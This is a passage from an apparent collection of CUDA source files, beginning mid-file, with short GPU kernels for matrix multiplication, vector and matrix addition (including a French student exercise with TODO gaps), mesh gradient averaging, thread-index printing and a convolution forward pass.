cudaMemcpy(B, dev_B, size * size * sizeof(float), cudaMemcpyDeviceToHost); //printMatrix(B, size); cout << "time: " << elapsedTime << " ms" << endl; delete [] A; delete [] B; cudaEventDestroy(start); cudaEventDestroy(stop); cudaFree(dev_A); cudaFree(dev_B); return 0; }
21,493
#include <iostream> #include <cuda_runtime.h> __global__ void kernel(void) { } int main() { kernel<<<1,1>>>(); std::cout << "Hello World!" << std::endl; return 0; }
21,494
#include "includes.h" __global__ void Matriz_GPU_Mult(int *a, int *b, int *c) { int k, sum = 0; int i = blockIdx.x * blockDim.x + threadIdx.x; int j = blockIdx.y * blockDim.y + threadIdx.y; if (i < N && j < N) { for (k = 0; k < N; k++) { sum += a[j * N + k] * b[k * N + i]; } c[j * N + i] = sum; } }
21,495
#include <algorithm> #include <cassert> #include <cstdlib> #include <iostream> #include <iterator> #include <vector> #include <chrono> #include <random> using namespace std; //=========================== kernel ======================================== __global__ void vectorAdd(int *a, int *b, int *c, int N) { int i = blockIdx.x*blockDim.x + threadIdx.x; int j = blockIdx.y*blockDim.y + threadIdx.y; int k = j*gridDim.x * blockDim.x + i; if (k < N) c[k] = a[k] + b[k]; } auto get_time() { return chrono::high_resolution_clock::now(); } //=========================== fuction main =================================================== int main() { constexpr int N = 1000 << 16; size_t bytes = sizeof(int) * N; int NUM_THREADS = 1 << 10; int NUM_BLOCKS = (N + NUM_THREADS - 1) / NUM_THREADS; // CPU int *h_a, *h_b, *h_c; cudaMallocHost(&h_a, bytes); cudaMallocHost(&h_b, bytes); cudaMallocHost(&h_c, bytes); for (int i = 0; i < N; i++) // initialisation les vacteurs a ,b { h_a[i]=rand() % 100; h_b[i]=rand() % 100; } //GPU int *d_a, *d_b, *d_c; cudaMalloc(&d_a, bytes); cudaMalloc(&d_b, bytes); cudaMalloc(&d_c, bytes); // CPU ---> GPU cudaMemcpy(d_a, h_a, bytes, cudaMemcpyHostToDevice); cudaMemcpy(d_b, h_b, bytes, cudaMemcpyHostToDevice); auto start = get_time(); vectorAdd<<<NUM_BLOCKS, NUM_THREADS>>>(d_a, d_b, d_c, N); // GPU ---> CPU cudaMemcpy(h_c, d_c, bytes, cudaMemcpyDeviceToHost); auto finish = get_time(); auto duration = chrono::duration_cast<std::chrono::milliseconds>(finish - start); cout << "temps écoulé en kernel = " << duration.count() << " ms\n"; for (int i = 0; i < N; i++) { assert(h_c[i] == h_a[i] + h_b[i]); } cudaFreeHost(h_a); cudaFreeHost(h_b); cudaFreeHost(h_c); cudaFree(d_a); cudaFree(d_b); cudaFree(d_c); cout << "terminé avec succès"<<endl; return 0; }
21,496
#include <stdio.h> #define NB_COLS 4000 // Nombre de colonnes de la matrice. #define NB_ROWS 4000 // Nombre de lignes de la matrice. void matrixInit(int *mat); // Initialisation d'une matrice. void checkRes(int *mat); // Vérification des résultats. // Noyau CUDA __global__ void MatrixAdd(int *a, int *b, int *c) { // TODO // indices : calculez l'indice global à l'aide de // blockIdx.x // blockDim.x // threadIdx.x } // Code du Host int main(void) { int *a, *b, *c; // Matrices A, B et C du host int *dev_a, *dev_b, *dev_c; // Matrices A, B et C du device int nbElements = NB_COLS * NB_ROWS; int matrixSize = nbElements * sizeof(int); int threadsPerBlock = 256; // TODO calculez le nombre de blocs nécessaires int blocksPerGrid = 0; // Allocation des matrices du host. a = (int *)malloc(matrixSize); if (a == NULL) { printf("Allocation failure\n"); abort(); } b = (int *)malloc(matrixSize); if (b == NULL) { printf("Allocation failure\n"); abort(); } c = (int *)malloc(matrixSize); if (c == NULL) { printf("Allocation failure\n"); abort(); } // Allocation des matrices du device. cudaMalloc((void **)&dev_a, matrixSize); cudaMalloc((void **)&dev_b, matrixSize); cudaMalloc((void **)&dev_c, matrixSize); auto cudaStatus = cudaGetLastError(); if (cudaStatus != cudaSuccess) { fprintf(stderr, "addKernel memory failed: %s\n", cudaGetErrorString(cudaStatus)); return -1; } // Initialisation des matrices A et B. matrixInit(a); matrixInit(b); // Copie des matrices A et B sur le GPU. // TODO transférer les données a et b vers le GPU // utilisez cudaMemcpy et cudaMemcpyHostToDevice // Lancement du noyau. // TODO lancer le kernel avec le nombre de bloc et le nombre de threads par bloc adéquats cudaStatus = cudaGetLastError(); if (cudaStatus != cudaSuccess) { fprintf(stderr, "addKernel launch failed: %s\n", cudaGetErrorString(cudaStatus)); return -1; } // Copie de la matrice C du GPU vers le host. cudaMemcpy(c, dev_c, matrixSize, cudaMemcpyDeviceToHost); checkRes(c); // Libération des matrices host et device. free(a); free(b); free(c); cudaFree(dev_a); cudaFree(dev_b); cudaFree(dev_c); getchar(); return 0; } ///////////////////////////////////////////////////////////////////////////////////////////// // // Fonctions outils. Rien à modifier. // ///////////////////////////////////////////////////////////////////////////////////////////// void matrixInit(int *mat) { int l, c; for (l = 0; l < NB_ROWS; l++) for (c = 0; c < NB_COLS; c++) mat[l * NB_COLS + c] = l + c; } void checkRes(int *mat) { int l, c; for (l = 0; l < NB_ROWS; l++) for (c = 0; c < NB_COLS; c++) if (mat[l * NB_COLS + c] != 2 * (c + l)) { printf("Erreur de calcul sur l'element %d:%d :\n", l, c); printf(" - Valeur calculee : %d\n", mat[l * NB_COLS + c]); printf(" - Valeur attendue : %d\n", 2 * (c + l)); exit(0); } printf("LEVEL 1: Done\n"); printf("Good job!\n"); }
21,497
#include "includes.h" __global__ void GradientAverageKernel(float4 *D, float4 *TD, unsigned int *NEIGHBOR, unsigned int *NBOFFSETS, unsigned int *nNeighbors, unsigned int nVertices) { int n,N; int offset,soffset; // since we are using multiple threads per blocks as well as multiple blocks int vidxb = 4*(blockIdx.x * blockDim.x) + threadIdx.x; //int basevert = 4*(blockIdx.x * blockDim.x); int vidx; //,tab; float4 nbd,td; // create a cache for 4 elements per block (4*BLOCK_SIZE elements) __shared__ float4 SI[4*BLOCK_SIZE_AVGG]; int bidx = 4*threadIdx.x; // this means we have 128 neighboring vertices cached for (vidx=vidxb; vidx<vidxb+4*BLOCK_SIZE_AVGG; vidx+=BLOCK_SIZE_AVGG) { if (vidx < nVertices) { SI[bidx] = D[vidx]; bidx++; } } __syncthreads(); bidx = 4*threadIdx.x; // preload the current BLOCK_SIZE vertices for (vidx=vidxb; vidx<vidxb+4*BLOCK_SIZE_AVGG; vidx+=BLOCK_SIZE_AVGG) { if (vidx < nVertices) { offset = NBOFFSETS[ vidx ]; N = nNeighbors[ vidx ]; td = SI[bidx++]; for (n = 0; n < N; n++) { soffset = NEIGHBOR[offset+n]; /* tab = soffset - basevert; if(tab > 0 && tab < 4*BLOCK_SIZE) nbd = SI[tab]; else */ nbd = D[soffset]; td.x += nbd.x; td.y += nbd.y; td.z += nbd.z; } td.x /= (float)(N+1); td.y /= (float)(N+1); td.z /= (float)(N+1); TD[vidx] = td; } } }
21,498
#include<stdio.h> #define ARRAY_SIZE 16 __global__ void print_index_and_data(int * data) { int tid = threadIdx.x; int block_offeset = blockIdx.x * blockDim.x; int row_offset = blockDim.x * gridDim.x * blockIdx.y; int gid = tid + block_offeset + row_offset; // printf("threadIdx.x: %d, offeset: %d, gid: %d, blockIdx.x: %d, blockDim.x: %d, gridDim.x: %d, data: %d\n", tid, gid, offeset, blockIdx.x, blockDim.x, gridDim.x, data[gid]); //printf("threadIdx.x: %d, gid: %d, blockIdx.x: %d, blockIdx.y: %d, blockDim.x: %d, blockDim.y: %d, gridDim.x: %d, data: %d\n", tid, gid, blockIdx.x, blockIdx.y, blockDim.x, blockDim.y, gridDim.x, data[gid]); printf("%d\t\t%d\t\t%d\t\t%d\t\t%d\t\t%d\t\t%d\t%d\n", tid, gid, blockIdx.x, blockIdx.y, blockDim.x, blockDim.y, gridDim.x, data[gid]); } int main() { // int nx = 16; // int ny = 16; int array_size_bytes = sizeof(int) * ARRAY_SIZE; // int h_data[ARRAY_SIZE] = {23, 9, 7, 14, 27, 4, 3, 11, 10, 13, 61, 42, 50, 67, 83, 22}; int h_data[ARRAY_SIZE]; for(int i=0; i<ARRAY_SIZE; i++) { h_data[i] =i; printf("%d ", h_data[i]); } printf("\n\n"); dim3 block(4); dim3 grid(2, 2); int * d_data; cudaMalloc((void**)&d_data, array_size_bytes); cudaMemcpy(d_data, h_data, array_size_bytes, cudaMemcpyHostToDevice); printf("threadIdx.x\tgid\tblockIdx.x\tblockIdx.y\tblockDim.x\tblockDim.y\tgridDim.x\tdata\n"); print_index_and_data<<<grid, block>>>(d_data); // print_index_and_data<<<4, 4>>>(d_data); cudaDeviceSynchronize(); cudaDeviceReset(); return 0; }
21,499
#include <cuda.h> #include <stdio.h> __global__ void simpleKernel(int *data) { // this adds a value to a variable stored in global memory data[threadIdx.x] += 2 * (blockIdx.x + threadIdx.x); } int main() { const int numElems = 4; int hostArray[numElems], *devArray; // allocate memory on the device; zero out all entries in this device array cudaMalloc((void **)&devArray, sizeof(int) * numElems); cudaMemset(devArray, 0, numElems * sizeof(int)); // invoke GPU kernel, with one block that has four threads simpleKernel<<<1, numElems>>>(devArray); // bring the result back from the GPU into the hostArray cudaMemcpy(&hostArray, devArray, sizeof(int) * numElems, cudaMemcpyDeviceToHost); // print out the result to confirm that things are looking good printf("Values stored in hostArray: \n"); for (int i = 0; i < numElems; i++) printf("%d\n", hostArray[i]); // release the memory allocated on the GPU cudaFree(devArray); return 0; }
21,500
#include "includes.h" __global__ void convolution_forward_kernel(float *input, float *filters, float *feature_map, float *hbias, int input_size, int channel_num, int feature_map_size, int filter_size, int filter_num, int lu_padding, float sigma){ __shared__ float shImg[32+MAX_FILETER_SIZE-1][32+MAX_FILETER_SIZE-1]; __shared__ float shFilter[MAX_FILETER_SIZE][MAX_FILETER_SIZE]; int imgIdx = blockIdx.y / (input_size / 32); int filterIdx = blockIdx.x / (input_size / 32); int tx = blockIdx.x % (input_size / 32) * 32 + threadIdx.x; int ty = blockIdx.y % (input_size / 32) * 32 + threadIdx.y; float *target = feature_map + imgIdx * feature_map_size * feature_map_size * filter_num + feature_map_size * feature_map_size * filterIdx + ty * feature_map_size + tx; float local_target = 0.0f; for(int g = 0; g < channel_num; g++){ if(threadIdx.x < filter_size && threadIdx.y < filter_size){ shFilter[threadIdx.y][threadIdx.x] = filters[filterIdx * channel_num * filter_size * filter_size + + g * filter_size * filter_size + threadIdx.y * filter_size + threadIdx.x]; } __syncthreads(); float *img = input + imgIdx * input_size * input_size * channel_num + g * input_size * input_size; float *shImgLoad = &shImg[threadIdx.y][threadIdx.x]; if(tx < lu_padding || ty < lu_padding){ *shImgLoad = 0; }else{ *shImgLoad = img[(ty-lu_padding) * input_size + (tx-lu_padding)]; } if(threadIdx.x < MAX_FILETER_SIZE-1){ shImgLoad = &shImg[threadIdx.y][threadIdx.x+32]; if(ty < lu_padding || (tx+32) >= (input_size+lu_padding)){ *shImgLoad = 0; }else{ *shImgLoad = img[(ty-lu_padding) * input_size + (tx+32-lu_padding)]; } } if(threadIdx.y < MAX_FILETER_SIZE-1){ shImgLoad = &shImg[threadIdx.y+32][threadIdx.x]; if(tx < lu_padding || (ty+32) >= (input_size+lu_padding)){ *shImgLoad = 0; }else{ *shImgLoad = img[(ty+32-lu_padding) * input_size + (tx-lu_padding)]; } if(threadIdx.x < MAX_FILETER_SIZE-1){ shImgLoad = &shImg[threadIdx.y+32][threadIdx.x+32]; if((ty+32) >= (input_size+lu_padding) || (tx+32) >= (input_size+lu_padding)){ *shImgLoad = 0; }else{ *shImgLoad = img[(ty+32-lu_padding) * input_size + (tx+32-lu_padding)]; } } } __syncthreads(); float *imgPtr = &shImg[threadIdx.y][threadIdx.x]; for(int i = 0; i < filter_size; i++){ for(int j = 0; j < filter_size; j++){ local_target += imgPtr[j] * shFilter[i][j]; } imgPtr += 32 + MAX_FILETER_SIZE - 1; } __syncthreads(); } local_target += hbias[filterIdx]; local_target *= __fdividef(1.0f , sigma * sigma); *target = local_target; }